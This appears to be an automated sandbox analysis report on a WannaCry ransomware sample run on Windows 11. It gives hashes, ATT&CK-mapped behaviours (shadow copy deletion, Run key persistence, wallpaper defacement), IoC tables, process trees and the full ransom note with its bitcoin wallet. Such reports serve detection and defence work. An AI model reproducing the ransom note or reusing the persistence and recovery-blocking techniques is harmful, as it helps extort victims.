wannacry | aef13f3ec8abf777929e42aa3de86774ab8362f7fbfcc0475c7b912ce253c002

max time kernel
411s
max time network
414s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
03-07-2024 20:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AutoDox.exe
Size

81KB
MD5

ec51cfbde4a4df4eceb8313adf8d93ca
SHA1

f8925a067c34ab1b0e7da2de961af20247ace3fa
SHA256

aef13f3ec8abf777929e42aa3de86774ab8362f7fbfcc0475c7b912ce253c002
SHA512

1cc6c73c33ce6d00c102f9ed3c6733c532f131b00761fd4ff59cda87c560e3ce3e06dfcbb8a886976ae5084c9d36c3f02d9afefca5b1403c20b53735fe24bada
SSDEEP

1536:9rsgf4VFHlI++UIoyjyCL6sf+Fle8Ifvl1loJbh76e:ClI++UIZIsf+Fle8Ift1loJbh76

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Drops startup file 2 IoCs

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDB6A6.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDB6AD.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Executes dropped EXE 23 IoCs

Processes:

taskdl.exe@[email protected]@[email protected]taskhsvc.exetaskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]@[email protected]taskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exe

pid	process
4904	taskdl.exe
3368	@[email protected]
5716	@[email protected]
2844	taskhsvc.exe
4484	taskdl.exe
2140	taskse.exe
5292	@[email protected]
1912	taskdl.exe
4664	taskse.exe
5044	@[email protected]
6092	@[email protected]
4072	taskse.exe
2988	@[email protected]
4016	taskdl.exe
5200	taskse.exe
5928	@[email protected]
2592	taskdl.exe
3616	taskse.exe
1052	@[email protected]
1940	taskdl.exe
3928	taskse.exe
6040	@[email protected]
4920	taskdl.exe

Loads dropped DLL 7 IoCs

Processes:

taskhsvc.exe

pid process

2844 taskhsvc.exe
2844 taskhsvc.exe
2844 taskhsvc.exe
2844 taskhsvc.exe
2844 taskhsvc.exe
2844 taskhsvc.exe
2844 taskhsvc.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

5656 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2844	taskhsvc.exe
2844	taskhsvc.exe
2844	taskhsvc.exe
2844	taskhsvc.exe
2844	taskhsvc.exe
2844	taskhsvc.exe
2844	taskhsvc.exe

pid	process
5656	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\obpfgsjmrmyjcf936 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_Ransomware.WannaCry.zip\\tasksche.exe\""	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe@[email protected]

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 13 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exefirefox.exePOWERPNT.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exePOWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133645109520452936"	chrome.exe

Modifies registry class 13 IoCs

Processes:

OpenWith.exechrome.exechrome.exefirefox.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\md_auto_file\shell\open	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\md_auto_file\shell	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\md_auto_file\shell\open\command\ = "\"C:\\Program Files\\Mozilla Firefox\\firefox.exe\" -osint -url \"%1\""	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\.md\ = "md_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\轺䚪ᕰ耀	OpenWith.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3107365284-1576850094-161165143-1000\{5EEC95E8-24A2-477A-91E2-39527907810F}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\.md	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\md_auto_file	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\轺䚪ᕰ耀\ = "md_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\md_auto_file\shell\open\command	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings	firefox.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4888 reg.exe
NTFS ADS 1 IoCs

Processes:

chrome.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master.zip:Zone.Identifier chrome.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

5380 POWERPNT.EXE

pid	process
4888	reg.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master.zip:Zone.Identifier	chrome.exe

pid	process
5380	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

chrome.exechrome.exetaskhsvc.exe

pid	process
2068	chrome.exe
2068	chrome.exe
236	chrome.exe
236	chrome.exe
2844	taskhsvc.exe
2844	taskhsvc.exe
2844	taskhsvc.exe
2844	taskhsvc.exe
2844	taskhsvc.exe
2844	taskhsvc.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

OpenWith.exe@[email protected]

pid process

4980 OpenWith.exe
5292 @[email protected]

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 45 IoCs

Processes:

chrome.exe

pid	process
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exeAUDIODG.EXE

description	pid	process
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: 33	3328	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3328	AUDIODG.EXE
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe
Token: SeShutdownPrivilege	2068	chrome.exe
Token: SeCreatePagefilePrivilege	2068	chrome.exe

Suspicious use of FindShellTrayWindow 39 IoCs

Processes:

chrome.exefirefox.exe

pid	process
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
3248	firefox.exe
3248	firefox.exe
3248	firefox.exe
3248	firefox.exe
2068	chrome.exe

Suspicious use of SendNotifyMessage 15 IoCs

Processes:

chrome.exefirefox.exe

pid	process
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
2068	chrome.exe
3248	firefox.exe
3248	firefox.exe
3248	firefox.exe

Suspicious use of SetWindowsHookEx 31 IoCs

Processes:

OpenWith.exefirefox.exe@[email protected]@[email protected]@[email protected]POWERPNT.EXE@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]

pid	process
4980	OpenWith.exe
4980	OpenWith.exe
4980	OpenWith.exe
4980	OpenWith.exe
4980	OpenWith.exe
4980	OpenWith.exe
4980	OpenWith.exe
4980	OpenWith.exe
4980	OpenWith.exe
4980	OpenWith.exe
4980	OpenWith.exe
4980	OpenWith.exe
4980	OpenWith.exe
3248	firefox.exe
3368	@[email protected]
3368	@[email protected]
5716	@[email protected]
5716	@[email protected]
5292	@[email protected]
5292	@[email protected]
5380	POWERPNT.EXE
5380	POWERPNT.EXE
5380	POWERPNT.EXE
5380	POWERPNT.EXE
5380	POWERPNT.EXE
5044	@[email protected]
6092	@[email protected]
2988	@[email protected]
5928	@[email protected]
1052	@[email protected]
6040	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 2068 wrote to memory of 4916	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4916	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4492	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4720	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 4720	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe
PID 2068 wrote to memory of 3168	2068	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

1560 attrib.exe
3268 attrib.exe

pid	process
1560	attrib.exe
3268	attrib.exe

C:\Users\Admin\AppData\Local\Temp\AutoDox.exe
"C:\Users\Admin\AppData\Local\Temp\AutoDox.exe"
1⤵
PID:4880

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdb38cab58,0x7ffdb38cab68,0x7ffdb38cab78
2⤵
PID:4916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1592 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:2
2⤵
PID:4492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:8
2⤵
PID:4720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:8
2⤵
PID:3168

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3048 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:2328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3068 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:1624

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4176 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:4576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4320 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:8
2⤵
PID:3624

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4508 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:8
2⤵
PID:3740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4648 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:3564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4060 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:2228

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:8
2⤵
PID:892

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4916 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:8
2⤵
PID:1920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3108 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:8
2⤵
PID:1936

C:\Program Files\Google\Chrome\Application\chrome.exe
